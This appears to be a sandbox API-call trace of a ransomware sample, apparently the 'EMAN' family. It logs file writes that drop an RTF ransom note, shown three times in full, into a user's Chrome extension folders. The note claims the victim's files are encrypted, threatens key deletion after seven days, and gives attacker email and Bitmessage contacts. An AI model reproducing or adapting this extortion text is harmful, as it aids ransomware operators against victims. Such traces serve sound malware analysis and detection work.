\\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.188] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\x1d", lpUsedDefaultChar=0x0) returned 8717 [0292.188] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.189] CloseHandle (hObject=0x2e8) returned 1 [0292.189] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\#readme_eman#.rtf")) returned 0xffffffff [0292.189] GetLastError () returned 0x2 [0292.189] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\sw\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 